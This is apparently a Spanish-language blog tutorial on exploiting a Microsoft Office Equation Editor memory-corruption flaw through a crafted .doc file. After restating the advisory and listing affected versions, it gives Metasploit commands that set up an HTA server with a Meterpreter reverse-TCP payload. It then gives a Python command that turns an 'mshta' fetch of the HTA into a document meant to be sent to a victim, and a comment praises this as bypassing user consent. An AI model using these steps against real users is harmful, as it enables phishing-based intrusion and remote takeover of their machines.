
En esta oportunidad les traigo una vulnerabilidad que nos permite ejecutar de forma remota código a una maquina mediante un archivo .DOC que afecta Microsoft Office 2007 a la versión 2016 esto pasa porque el software no maneja adecuadamente los objetos en memoria, también conocida como "vulnerabilidad de daños en la memoria de Microsoft Office". Si el usuario actual inicia sesión con derechos administrativos de usuario, un atacante podría tomar el control del sistema afectado. Un atacante podría luego instalar programas; ver, cambiar o eliminar datos; o cree cuentas nuevas con derechos de usuario completos. Los usuarios cuyas cuentas están configuradas para tener menos derechos de usuario en el sistema podrían verse menos afectados que los usuarios que operan con derechos administrativos de usuario. La explotación de la vulnerabilidad requiere que un usuario abra un archivo especialmente diseñado con una versión afectada de Microsoft Office o el software Microsoft WordPad. En un escenario de ataque de correo electrónico, un atacante podría aprovechar la vulnerabilidad enviando el archivo especialmente diseñado al usuario y convenciendo al usuario de que abra el archivo. En un escenario de ataque basado en web, un atacante podría alojar un sitio web (o aprovechar un sitio web comprometido que acepta o aloja contenido proporcionado por el usuario) que contiene un archivo especialmente diseñado para explotar la vulnerabilidad. Un atacante no tendría manera de obligar a los usuarios a visitar el sitio web. En su lugar, un atacante tendría que convencer a los usuarios para que hagan clic en un enlace, generalmente mediante una incitación en un correo electrónico o mensaje instantáneo, y luego los convencerá de que abran el archivo especialmente diseñado. La actualización de seguridad corrige la vulnerabilidad al eliminar la funcionalidad del Editor de ecuaciones.
Para más Información
Versiones Afectadas:
Microsoft Office 2007 SP3
Microsoft Office 2010 Service Pack 2 (ediciones de 32 bits)
Microsoft Office 2010 Service Pack 2 (ediciones de 64 bits)
Microsoft Office 2013 Service Pack 1 (ediciones de 32 bits)
Microsoft Office 2013 Service Pack 1 (ediciones de 64 bits)
Microsoft Office 2016 (edición de 32 bits)
Microsoft Office 2016 (edición de 64 bits)
Microsoft Office 2016 Click-to-Run (C2R) para edición de 32 bits
Microsoft Office 2016 Click-to-Run (C2R) para la edición de 64 bits
Paquete de compatibilidad de Microsoft Office Service Pack 3
Microsoft Word 2007 SP3
Microsoft Word 2010 Service Pack 2 (ediciones de 32 bits)
Microsoft Word 2010 Service Pack 2 (ediciones de 64 bits)
Paquete de servicio de Microsoft Word 2013 RT 1
Microsoft Word 2013 Service Pack 1 (ediciones de 32 bits)
Microsoft Word 2013 Service Pack 1 (ediciones de 64 bits)
Microsoft Word 2016 (edición de 32 bits)
Microsoft Word 2016 (edición de 64 bits)
hta_server
El módulo q vamos a estar utilizando nos permite alojar una aplicación HTML (HTA) que cuando se abre ejecutará una carga a través de Powershell. Cuando un usuario navega al archivo HTA, IE lo solicitará dos veces antes de que se ejecute la carga útil. Pero en este caso gracias al script
RTF_11882_0802 que vamos a utilizar la url del archivo HTA (.hta) se convierte en un archivo de documento (.doc) que se enviará a la Víctima y activará la vulnerabilidad de ejecución remota de código. Una vez que la Víctima abrirá ese archivo de Documento, la carga será entregada y además nos dará la Sesión de Meterpreter
msf > use exploit/windows/misc/hta_server
msf exploit (hta_server)>set lhost ip
msf exploit (hta_server)>set srvhost ip
msf exploit (hta_server)>set payload windows/meterpreter/reverse_tcp
msf exploit (hta_server)>set lport puerto
msf exploit (hta_server)>exploit
Luego de poner a la escucha nuestra modulo, vamos a pasar a ejecutar nuestro script que lo vamos a obtener de la siguiente dirección. Y vamos a realizar el siguiente comando:
Python RTF_118802_0802.py -c "mshta http:laurldelarchivoHTA" -o Nombredeldocumento.doc
1 Comentarios
WAW buenisimo el aporte la forma mas facil de saltar el concentimiento del usuario pormedio de un .doc GRACIAS!
ResponderBorrar